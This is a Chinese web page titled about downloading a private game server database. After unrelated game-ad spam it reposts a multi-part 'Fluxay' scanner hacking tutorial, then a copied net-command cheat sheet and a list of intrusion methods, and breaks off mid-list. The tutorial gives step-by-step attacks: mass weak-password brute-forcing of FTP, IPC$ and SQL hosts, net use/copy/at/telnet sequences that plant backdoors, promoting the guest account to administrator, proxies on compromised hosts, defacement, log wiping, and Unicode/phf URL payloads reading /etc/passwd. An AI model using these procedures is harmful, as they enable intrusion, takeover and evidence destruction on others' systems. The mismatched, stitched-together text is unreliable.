如何下载传奇私服数据库

您好，现在好玩的游戏好难找的现在，最受欢迎的还是传奇和仙侠手游，当然每个时期流行的游戏都不一样。毕竟手游很快红起来，又很快没人玩了，每个人的口味都不一样，选起来也方便，地址点击官方链接领福利 比较实用的还是百度旗下推荐给你这样一个手游排行榜，里面包含大榜单，新游期待榜热门手游榜，亲可以依据具体情况去选择，这里每天都更新，现在最多人玩的游戏一看就知道了，还有一个对应的，直接拿礼包，亲可以看看。 下班无聊玩玩还可以，可不要上瘾哦。

友情提示：抵制不良游戏，拒绝盗版游戏。 注意自我保护，谨防受骗上当。 适度游戏益脑，沉迷游戏伤身。 合理安排时间，享受健康生活。适龄提示：适合18岁以上使用。

这样吧,我这有个杀手的流光教程,希望能对你有用,你自己慢慢研究吧:

谈起国内的黑客，可能因为中国的互联网起步较晚，中国的黑客也很有“中国特色”在我所知道被公认的

第一批黑客中，有许多是很抽象的概念，这里所说的抽象是我当时的感觉，有点雾里看花。听到报纸上说，

XXX黑客黑了XXX，心里立刻素然起敬。

后来上了网，拿着144的极品猫恭敬的浏览了这些大侠的站点，便觉得自己也很高大起来，仿佛自己也成了黑客，

后来看看他们所写的一些攻击教程，才发现并不比到隔壁邻居家偷点东西困难:)

再后来自己因为家事离开的网络，主要是上不起，缺￥。之后的事就是常听到新闻、报纸报道XXX黑客黑了某站

点，XXX声称对此负责等等类似的言论。感觉到中国的黑客业真是蓬勃的发展起来了：）

我就曾经遇到这样的黑客，他连win95都不会装，系统出错要打电话给电脑公司的。我就觉得中国的黑客特色

是：浮躁太多、不肯踏脚踏实地的作事情。说白了就是伪黑客太多。

下面是我和一个现在在某个地方担任重职的黑客现实中的对白：

某黑客：“你黑站点用工具么？”

我：“用的”

某黑客：“不用工具，不要用这个，用工具的都是二流黑客，黑个站点用工具？不用的”

我：“哦”

某黑客：“你要黑站点，不用工具你能知道什么”

我看到黑客要指点，立刻全神贯注。

某黑客：“它的80端口是开的，对吧！有端口开着你还用工具干嘛，有端口开着你就黑……”

听起来像新闻中XX功的李XX的讲课。后面还有许多，我也懒的说了。

肯脚踏实地的黑客太少了!

在国内，流光属于个比较不错的扫描器，是个很有潜力的工具，有代表性！

在流光之前，有许多工具具备流光的特性，应该说是流光吸收了他们的优点，但没有一个像流光这样的高集成

度的。

在以前，我一直觉得流光只是个玩具，对于一个站点，我们有多少时间和金钱去暴力猜解呢？包括那些

小的猜解工具，和花样繁多的木马变种。当作练练编程的作品尚可，拿出来吓人就不对了。导致今天的杀毒软

件都敢吹能杀XXX种黑客程序 ：）

正是流光出现的时间较长、很多人都是从流光入门的原因，所以从流光谈起，能给新手一些正确的入门捷径。

我并不是一个流光高手，不能解决你遇到的所有问题，所以当我写下流光的系列教程的时候，心里是很不踏实的。

希望我的这些不成文的系列，能给你的学习带来一些方便。

下面是对新手的几个问题解答：

1、除了流光，国内还有没有其它的比较好的扫描器，说几个。

A：有，scanex X-scan

2、流光好用么 ？

A:用了以后在问 ！

3、我是新手，学习中应该注意什么？

A：少说多做

二

许多新人在用流光的时候不知道如何下手，小榕论坛来讨论的也多是“如何添加用户”这样的初级问题 ：），就抽了点时间写这个简单的教程,希望让新手快速入门。

我个人认为流光的破解可分为5大部分：

一、POP3/FTP/…探测

二、IPC探测

三、SQL探测

四、高级扫描

五、其它 …

因为开发时间的原因，上面的探测模式略有不同，所以分成了四个部分，本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了：）

下面我就简单说一下基本的破解流程：

1、你得有流光，我这里试验用的是流光2001FOR Win98 中文版FOR Win2000的也可以。

首次启动流光，看到如下图的界面：

首次使用是要注册的，不过不要想到花钱：），小榕只是想看看有多少人用他的流光而已。你可以填好相应的选项，然后点发送即可，如果发送失败，你把发送服务器换个就好了。

因为重装系统，我也不知道我发了多少次了 ：（ 。如果不想注册，就稍等下面的进度条走完，点稍后即可。如上图：

2、找个站点，我选的是中华网wwwchinacom的主页空间（home4uchinacom），探测方式：FTP。

有人常问扫描端口有什么用，其实作用就是你知道他提供了什么服务，然后可以采取相应的探测方式来获得PASS了：）我们知道主页几乎都用的FTP上传，我们这次就用来测试一堆用户名，看看有没有弱智的密码，呵呵，如果有 hackeratchinacom 这样的，也不妨霸占为己有：）

3、加入要破解的站点名称：右键单击FTP主机→编辑→添加→输入 home4uchinacom →确定！

4、加入用户名：我们要破解的是一堆用户名，所以要加入用户名的列表文件！我们就加入流光目录下的 Namedic ：）右键单击刚才添加的主机：home4uchinacom → 编辑 → 从列表中添加 → Namedic → 打开

然后会有“用户已存在列表中”的提示，我们选中“不再提示” → 确定 。如下图：

用户名太多，我们可以用点主机前面的“—”号把用户列表缩起来，如下图：

大家注意名字前面的小框中必须有√要是没有就无法探测了。

5、有了用户名，我们就可以进行探测了，大家会想到怎么不用密码？其实流光有个简单模式的探测，也就是用内置的密码”：“123456”和“用户名”来进行探测，因为这样的密码是使用频率最高的：）

当然你可以修改这个简单模式的文件，加入你认为弱智的密码。方法是：单击 工具菜单 → 模式文件设定 → 简单模式探测设置文件 → 加入你要加入的密码 → 把设置文件存盘！

下面我们就来看看这一堆名字里面有多少是用“123456”和“自己名字”来作为密码的。

探测 → 简单模式探测！

探测中…

6、探测完毕，也看到结果了，流光会问我们是否查看入侵检测报告，不想看可以选否。

报告的画面

7、如果要探测的是一个用户名，就需要添加字典、或者密码方案。方法是：右键单击解码字典或方案 → 编辑 → 添加 → 选择一个密码档即可。

以上就是流光的一次简单的探测了，事实上这些功能只能算是流光的25版的功能，流光2001增加的IPC/SQL/高级扫描等功能，使流光更加强大。如果你对这个已经很熟悉了，相信你看流光的HELP就会很快的学会其它的使用方法的。

关于用户名的问题：有人觉得自己加入的用户名不一定存在，如果不存在岂不是白费了力气？这点你大可以放心，流光会进行验证的。而且现在注册的用户入数之多，想个没有的名字都难，不信你随便敲个试试。

关于字典的问题：流光可以使用字典方案来探测，当然你也可以生成字典，有的新手在作练习的时候不知道怎么做，你也可以用记事本生成，每行输入一个密码，存盘后将扩展名改称DIC，流光就认出来了：）如果你连扩展名都不会改 ：（ 那……

只要是学习、谁都会遇到困难，我也是问题多多，还得向小榕、EKIN讨教，欢迎大家多交流 ：）

三

很长时间也没有写什么东西了，这源于我的懒惰和生活缺乏激情。我的记事本上一大篇都是欠朋友的承诺 ：（

你既然看到这儿了，就在听我牢骚几句吧：）搞安全应该有正确的心态，别以为你会了个工具使用就可以一步登天。

交流、学习才是最重要的，把自己心态放正，无论我们是高还是低。

今天要写的是流光的IPC探测：

一、目的和任务：

1、用流光的IPC探测获得一台NT主机的管理权限，并将这台主机做成一个跳板/代理。

2、学习IPC探测的相关知识。

二、探测流程：

1、你得有流光，我这里试验用的是流光2001FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/

2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000，否则流光启动会失败！

什么是IPC：

IPC是指"InterProcess Communications",准确的说是ipc$，是默认的在系统启动时的admin共享。

IPC$是Windows NT/2K中特有的远程网络登陆功能，它的特点是在同一时间内，两个IP之间只允许建立一个连接。

注意，你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。

可不可以通过IPC$暴力破解密码？当然可以 ！ 不过，是不是太笨了点 …

2、首次启动流光，会看到注册的画面，具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC

探测获得管理的权限。这里我们要作的是得到一台跳板，那么就可以用命中率高的办法来探测了（测试一堆IP来得

到弱口令）。

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。

图main1

图main2

3、出先了上面的小窗口，输入我们要破解的IP段，我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机

4、探测中…… （start1）

（注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现"IP保留"的字样）

5、这是扫描到的NT/98主机列表：（jg1）

6、没有扫描到常用密码：（

7、就不要查看报告了 ：…

8、有了不少NT/98的机器了，正式开始IPC$探测：IPC$主机－探测－探测所有IPC$用户列表。

9、注意下面两个对话框的设置：全选上，我们只要IPC$管理员的弱口令。然后点选项

10、点“选项” ：为了加快弱口令扫描速度，这里的两个我们可以全部取消，比如下面的那个，如果对方禁止列出用户了，我想对于一个网管来说，弱口令可能性也是微乎其微。

11、探测中……

12、有密码了：）

13、又出现了查看报告的窗口，看看 ：）

14、有远程主机的管理密码了，我们剩下的就是想办法控制它了，有什么好办法么？ ：）有的是 ！自己看看工具－

菜单下的IIS远程命令:)是不是很简单呢，我以后在说，今天还是先练习net 命令吧。

15、黑了他 ！

开个dos prompt 执行如下命令，本次用的例子如下图。

1、 net use \\对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接

2、 copy icmdexe \\对方ip\admin$ || admin$是对方的winnt目录 ：） 这里文件多。

3、 net time \\对方IP || 看看对方的本地时间

4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序，在这里我们用soon这个程序来做也可以，它可以取代 3/4两步。

5、 telnet 对方ip 端口 ||

6、输入pass （如果不是用icmdexe，或者没有设置口令就不用了） ||

7、在开个窗口，继续copy 我们用的东西。 copy sockexe copy ntlmexe copy clexe clearexe

图cmd1

图cmd2

如果我们真的想黑了他，只需要把我们的首页文件覆盖目标的首页就ok了，我们可以通过dir /s defaulthtm或者dir /s indexhtm 来确定对方首页的为止，一般是在X:\interpub\wwwroot\

假如首页文件是defaulthtm并且在c:\interpub\wwwroot，这样:copy defaulthtm \\ip\c$\interpub\wwwroot

下面的图有演示

7、其实黑人家是很低级并且没意思的：（，我们最好是物有所有，作成跳板吧，今后干活方便点：）

执行我们copy 过去的ntlmexe ，取消验正。在给自己留个后门，比如提升guest的权限，或者其它的后门工具，这类东西多了自己选吧，看看杀手copy的那堆东西 ：）

8、做个SOCK5代理玩玩，用在QQ上不错喔：

执行我们copy 过去的sock -install，net start skserver 看看用在QQ上的效果：）

是不是没有看清上面的步骤呢？

下面是我telnet 上去后所有的命令：）

9、还能做成其他的么 ？

当然了，只要你有时间，并且愿意做，我曾经偷偷的把自己的主页放到人家的server上，速度快、空间无限，嘿嘿 ：）

10、日志清除，断开连接 ：

执行我们copy 过去的clexe clearexe 都可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use \\ip\ipc$ /delete

这步我认为是必需的，尤其是在一些有争议的站点上，或者是国内的站点，除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。

在网吧写完 ：（ 错误之处请赐教。

只要是学习、谁都会遇到困难，我也是问题多多，还得向小榕、EKIN讨教，欢迎大家多交流 ：）

四

关于IPC$的终于写完了，那个该死的网吧，闹哄哄的声音声声入耳 ：（，你可能想不出，IPC$探测是我在网吧完成的，而且那个网吧还有公安部门的网络监视器，这东西很有意思，好像是VXD调用，和IE运行库集成到一起的。哪天非弄来研究一下，说不定一款别具特色的木马就问世了 ：）

不知道你看完前一个教程有没有要扁我的想法。。。。

交流、学习才是最重要的，把自己心态放正，无论我们是高还是低。

今天要写的是流光的SQL探测，顺便说说ipc$补遗和其它的探测手段。

一、目的和任务：

1、用流光的SQL探测获得一台NT主机的管理权限。

2、学习SQL探测的相关知识。

3、IPC$补遗和其它…

二、探测流程：

1、你得有流光，这话不用在说了吧：）

什么是SQL：

SQL：微软开发的数据库，专门用在微软的OS上，功能类似Linux 下的Mysql，晕……，到底谁类似谁啊？有时间

去看看SQL的联机手册，说的很明白。

SQL服务程序支持的网络协议:

Named pipes :使用NT SMB端口来进行通信，存在被SNIFFER截获数据的危险。

IP Sockets :默认状态下开1433端口，可以被扫描器探测，存在被SNIFFER截获数据的危险。

Multi-Protocol ：客户端需要支持NT RPCs，数据加密。

NWLink ：存在被SNIFFER截获数据的危险。

AppleTalk (ADSP)：存在被SNIFFER截获数据的危险

Banyan Vines ：存在被SNIFFER截获数据的危险

在Internet上，95％以上的SQL Server 采用的都是IP Sockets协议，流光探测的就是这个协议默认的1433端口

2、我们要获得SQL 主机的管理权限，那么还用命中率高的办法来探测了（测试一堆IP来得到弱口令）。

对一台固定主机的探测等我下期的教程：）

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。

图main

3、出先了下面的小窗口，输入我们要破解的IP段，我们输入了来看看。（注意如果你要探测的是流光保留的国内的IP段，会被禁止的，也就是探测的时候信息栏出现“地址保留的信息”）

图inputip

4、探测中……

5、有密码了：） 图psss 1→3

6、下面我们进一部获取管理员的权限。

用SQL 客户端去连接主机，没有装SQL :( ……………… 没关系，流光自带了连接的工具，以前我一直都是用的天行的工具SQLexec，但现在可以不用它了。

打开菜单 工具 → MSSQL工具 → SQL远程命令看看：）

图tools

图SQLcmd

7、获得管理权限、增加后门

图cmdline

8、现在我们已经是管理员了：）

以前我们是用at命令来远程运行程序，今天顺便说说流光中自带的“种植者”，看看 工具 → nt/iis工具 → 种植者，我们来用它远程启动icmd这个后门。

图lookcrop

图crop

图cropend

一分钟后登陆看看：

9、再说说 工具 → 模式文件设定 → ipc简单设置文件 。

图mode

“工具”中其他的项目和上面说的两个类似，就不多说了。

10、日志清除，断开连接 ，参考IPC探测，记住可以用种植者远程执行命令。

关于IPC$补遗：上篇对与IPC$探测的文章，写完后觉得还差点什么没有说：）

1、我们虽然只探测管理员（admin）的弱口令，实际上在真正攻击中是任何一个用户口令都不会放过尝试的，因为我们获得了

普通用户权限后可以提升权限，事实上，一个普通用户的权限在＊nix攻击中是非常重要的。

2、获得口令后，攻击手法多样，不要局限于我的例程。

3、如果对方没有XXX怎么办？，这类的问题去看看我以前整理的流光FAQ。

关于其它探测：

玩玩3389 ？

首先终端是WIN2K提供的功能，所以我们在扫描的时候就要选择 “NT/98”的主机，在得到主机列表后自定义端

口来扫描这些主机的3389端口，然后……

玩玩cisco路由器？

自己想想怎么作 ？要是想出来了，我的以后的教程就不用看了 ：）

明白了么？我说的意思是要灵活使用流光：）

五

以前一不小心吹出了要写流光教程的想法，结果话说出口就无法收回，如果上天肯给我一次改正的机会的话，我要对这套教程说，我不写。如果非要逼我说出内心的想法，我要说的是：不写不写就是不写！：）

交流、学习才是最重要的，把自己心态放正，无论我们是高还是低。

今天要写的是流光的高级扫描向导：

一、目的和任务：

1、学会高级扫描向导的使用！

2、学习扫描的原理。

二、探测流程：（针对某一个ip）

1、start fluxay !

以前我们都是通过某一种探测手段，来测试很多ip获得相应的脆弱系统的管理权限。

对于某个IP的主机，是不是有点束手无策了呢？

：） 试试流光的高级扫描。。。

本次的受害者。。。是我所在的xxx内部服务器 ip:19216801

什么是扫描：

简单的说，就是利用get /put /send 等方法获取目标主机的信息的手段。

向目标主机发出请求，如果目标主机的某个端口正在侦听，就会对我们的请求给予一定的相应，我们就可以通过

这些返回的数据来判断目标主机的状态。

2、高级扫描提供了两种方式：

1）向导模式 (文件－高级扫描向导)

2）正常模式（探测－高级扫描工具）

就功能而言，这两种方式没有什么不同，主要是看个人的使用习惯，当然向导模式比较易用。

图1 图2

好了，我们用图1中的向导模式 Ctrl+W 。

图option

3、出先了上面的小窗口，输入我们要破解的IP，把起始地址和结束地址输入相同的ip。

目标系统：如果你知道，就选择相应的系统，如果选择all ,流光会自动判断，但毕竟影响了时间。

如何判断目标的系统呢 ？

最简单的就是ping 和浏览对方的主页了 ，看对方主页，如果状态栏有本地asp调用，基本可以判断是win2k的系统，要是php调用，就可以认为是unix类系统。

下面ping的结果证明这台主机是Win2K Server，所以目标系统就选择：“Windows NT /2000”

图ping

检测项目 ：因为是针对一台主机，当然获得的信息越多越好，所以检测项目就“全选”

这是选择完的贴图：

option1

4、设置扫描的端口，这个标准就行。

图ports

5、Pop3探测设置，默认即可。

图pop3

6、Ftp探测设置，默认即可。

图ftp

7、smtp探测设置、imap探测设置、telnet探测设置、cgi探测设置，全部采用默认设置。一直点击“下一步”到cgi rules （cgi规则的设置）

图cgi

8、下面的sql探测设置、ipc探测设置、iis探测设置、misc探测设置，全部采用默认值：一直点击“下一步”到plugins（插件设置）

图plugins

9、最后设置“猜解用户名字典、猜解密码字典、保存扫描结果的位置、扫描线程、网络选项”都用默认的了，当然你

可以根据具体情况更改，不要总是照搬：）

end

10、探测中，出现了不少探测的结果 ：）图check

11、这次的报告是最值得看的 ：－ 图report

12、扫描结果简单分析：图all

三、快速获得肉鸡的方法：

约定：1、要获得nt 肉鸡 2、使用ipc、sql、idq、printer 来获取 ，都是可以直接得到管理权限的 ：）

下面的扫描向导中，我可以只选择符合上面的选项了。

看看，和上面的比较理解一下。

不到一分钟就出来结果了，快 ！ 需要注意的就是在最后一步的“猜解的用户名、猜解的字典”这两个尽量自己把默认的字典内容修改一下，比如“密码字典”中只有123456，会大大加快速度 ：）

记住要写两行哦

流光是不是只会对付Windows/NT呢 ？

当然不是，我现在只是举NT的例子。

如果我的教程给你这样的想法，那…… 小榕可能要痛扁我了 ：（

六

交流、学习才是最重要的，把自己心态放正，无论我们是高还是低。

今天要写的是流光的扫描结果分析：

一、目的和任务：

1、分析并利用流光的扫描结果。

2、顺便学点相关的知识。

二、开始分析：

1、具备相关的系统知识，基础是必须的 。

比如21端口开放：想到了什么呢？wu_ftp溢出 ，本地权限提升，溢出root ？这需要点经验了，但你至少应该想到去cd /看看吧。

其他还有好多，看看基础的书吧，我只能说一下方法。

2、我们用IPC$扫描和上篇的高级扫描，我们得到的许多结果，比如idq、print、unicode、frontpage，来对这些结果进行分析利用一下。

先说说一般攻击流程：

1）确定攻击目标：这个要看我们的目的了 ；）

2）搜集目标的相关资料

3）根据获得的信息进行攻击

4）获得最高权限

5）留后门、清理日志

现在我们已经能够获得对方的相关资料了，在NT Server 中后门和日志也说过了，所以今天说3、4步的内容。

2、具体攻击实施方法：

1）利用url攻击的方法：这种方式用的很多，比如unicode。通常是在IE地址栏通过提交修改的URL，进行非法登陆或者浏览等。

2）利用暴利破解：比较费时，但也有一定的技巧可寻，比如用finger后的用户列表进行简单探测。

3）利用系统的相关服务攻击：比如输入法漏洞＋终端，Frontpage 扩展，行行色色的溢出等。

如何进行溢出呢 ？

一般来说是在网上找到针对漏洞相关的溢出源码，根据自己的需要进行修改，然后用gcc 或者c++等编译，最好用编译好的程序攻击了，绝大多数都是这样的格式：programexe -option ip

是不是觉得很难呢？

现在网上有许多好心的大虾都给你修改编译好了，你直接找来用就行。但。。。。。不想多学点东西么？

好了，不罗嗦了：）

先看看构造特殊url：（以Unicode为例）

什么是Unicode

Unicode漏洞是因为在Unicode编码中，有这样一个编码方式%c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40) 等等，

而该死的IIS 却是这样理解的：把“%c1%hh" 解释成(0xc1 -0xc0) 0x40 + 0xhh

结果就有了这样的组合：

%c1%1c -〉 (0xc1 - 0xc0) 0x40 + 0x1c = 0x5c = '/'

%c0%2f -〉 (0xc0 - 0xc0) 0x40 + 0x2f = 0x2f = '\'

通过这两个小小的“/”“\”，我们就可以构造特殊URL来深入到系统的根目录了，看看下图：

url1

url2

url3

这只是个简单的例子，用URL的还有的是，比如phf漏洞：

可以构造 http://wwwhackercom/cgi-bin/phfQalias=x%0a/bin/cat%20/etc/passwd

在比如：http://wwwhackercom/vti_pvt/servicepwd 等等

域名是随便写的，勿对号入座哦

暴利破解，简单探测，我在第一篇教程中就说了，自己找找看看。

我们来说利用系统服务溢出的：

输入法漏洞需要WIN2K 终端，终端成了hacker工具：）

Frontpage 扩展，需要Frontpage ， 作网页的东西也成了黑客工具：）

Frontpage 扩展攻击： 启动Frontpage － 文件 － 打开站点 － 输入站点的IP ，如果要口令就输入得到的口令，免费给人家设计的主页吧 ：）

是不是很简单呢？

看看溢出：

这个是图形的，很简单，其实溢出程序多是命令行的。

idq

nc

对方存在shtmldll这个漏洞，如何攻击呢？

先找找关于漏洞的说明，然后找相关的程序，比如我用的：

dosexe 211212211 对方IIS 拒绝服务了 ，当掉 ！

会了么？

好了，你应该学到点什么了，准确的说你应该发现点什么了。发现什么了呢？

1、凡是涉及到概念基础的时候，你潜意识中是跳过去不愿意看的。

2、攻击多是用现成的工具实现的。用工具当然没什么不好，但你知道当溢出时，为什么要用nc监听本地端口么？

我所讲的攻击实例其实是为了满足你的好奇心而已，希望你能看得更深一点：）

一 相关命令

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样

二 经典入侵模式

1 C:\>net use \\127001\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127001建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2 C:\>copy srvexe \\127001\admin$

先复制srvexe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3 C:\>net time \\127001

查查时间，发现127001 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4 C:\>at \\127001 11:05 srvexe

用at命令启动srvexe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5 C:\>net time \\127001

再查查到时间没有？如果127001 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6 C:\>telnet 127001 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7C:\>copy ntlmexe \\127001\admin$

用Copy命令把ntlmexe上传到主机上（ntlmexe也是在《流光》的Tools目录中）。

8 C:\WINNT\system32>ntlm

输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9Telnet 127001，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10 C:\>net user guest /active:yes

将对方的Guest用户激活

11 C:\>net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12 C:\>net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

ipc$经典入侵步骤：

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功，连接你的肉鸡

常用的网络命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 > c:\ttxt" 在远程计算机上建立文本文件ttxt；

下面纯手打，上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off > txt|exit 添加文本

echo 内容 >> txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组

端口号小于256的一般为常用端口号。其中常用的保留TCP端口号有HTTP 80、FTP 20/21、Telnet 23、SMTP 25、DNS 53等；常用的保留UDP端口号有DNS 53、BootP 67（server）/ 68（client）、TFTP 69、SNMP 161等。

TCP与UDP段结构中端口地址都是16比特，可以有在0-65535范围内的端口号。任何TCP/IP实现所提供的服务都用1-1023之间的端口号，是由ICANN来管理的。端口号从1024-49151是被注册的端口号，被IANA指定为特殊服务使用。从49152-65535是动态或私有端口号。

扩展资料：

各个端口及端口号的实际用途

1、1系端口

POP3服务器开放102端口，用于接收邮件，客户端访问服务器端的邮件服务；NEWS新闻组传输协议，承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器；137、138是UDP端口，当通过网上邻居传输文件时用这个端口。

2、2系端口

FTP服务器开放的21端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录；PcAnywhere建立的TCP和22端口的连接可能是为了寻找ssh；扫描23端口是为了找到机器运行的操作系统。

3、3系端口

轻型目录访问协议和NetMeeting Internet Locator Server共用389端口。

4、4系端口

网页浏览443端口，能提供加密和通过安全端口传输的另一种HTTP；木马HACKERS PARADISE开放456端口。

-端口号

-网络端口

黑客是入侵别人电脑的方法有9种。

1、获取口令

这又有三种方法：

一是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户账号和口令，对局域网安全威胁巨大；二是在知道用户的账号后（如电子邮件@前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但黑客要有足够的耐心和时间；三是在获得一个服务器上的用户口令文件（此文件成为Shadow文件）后，用暴力破解程序破解用户口令，该方法的使用前提是黑客获得口令的Shadow文件。

此方法在所有方法中危害最大，因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器，而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码，尤其对那些弱智用户(指口令安全系数极低的用户，如某用户账号为zys，其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内，甚至几十秒内就可以将其干掉。

2、放置特洛伊木马程序

特洛伊木马程序可以直接侵入用户的电脑并进行破坏，它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载，一旦用户打开了这些邮件的附件或者执行了这些程序之后，它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中，并在自己的计算机系统中隐藏一个可以在Windows启动时悄悄执行的程序。

当您连接到因特网上时，这个程序就会通知黑客，来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后，再利用这个潜伏在其中的程序，就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等，从而达到控制你的计算机的目的。

3、WWW的欺骗技术

在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问，如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在：正在访问的网页已经被黑客篡改过，网页上的信息是虚假的！例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器，当用户浏览目标网页的时候，实际上是向黑客服务器发出请求，那么黑客就可以达到欺骗的目的了。

4、电子邮件攻击 

电子邮件攻击主要表现为两种方式：

一是电子邮件轰炸和电子邮件“滚雪球”，也就是通常所说的邮件炸弹，指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件，致使受害人邮箱被“炸”，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪；

二是电子邮件欺骗，攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序（据笔者所知，某些单位的网络管理员有定期给用户免费发送防火墙升级程序的义务，这为黑客成功地利用该方法提供了可乘之机)，这类欺骗只要用户提高警惕，一般危害性不是太大。

5、通过一个节点来攻击其他节点

黑客在突破一台主机后，往往以此主机作为根据地，攻击其他主机(以隐蔽其入侵路径，避免留下蛛丝马迹)。他们可以使用网络监听方法，尝试攻破同一网络内的其他主机；也可以通过IP欺骗和主机信任关系，攻击其他主机。这类攻击很狡猾，但由于某些技术很难掌握，如IP欺骗，因此较少被黑客使用。

6、网络监听

网络监听是主机的一种工作模式，在这种模式下，主机可以接受到本网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接受方是谁。此时，如果两台主机进行通信的信息没有加密，只要使用某些网络监听工具，例如NetXray for windows 95/98/nt，sniffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性，但监听者往往能够获得其所在网段的所有用户帐号及口令。

7、寻找系统漏洞

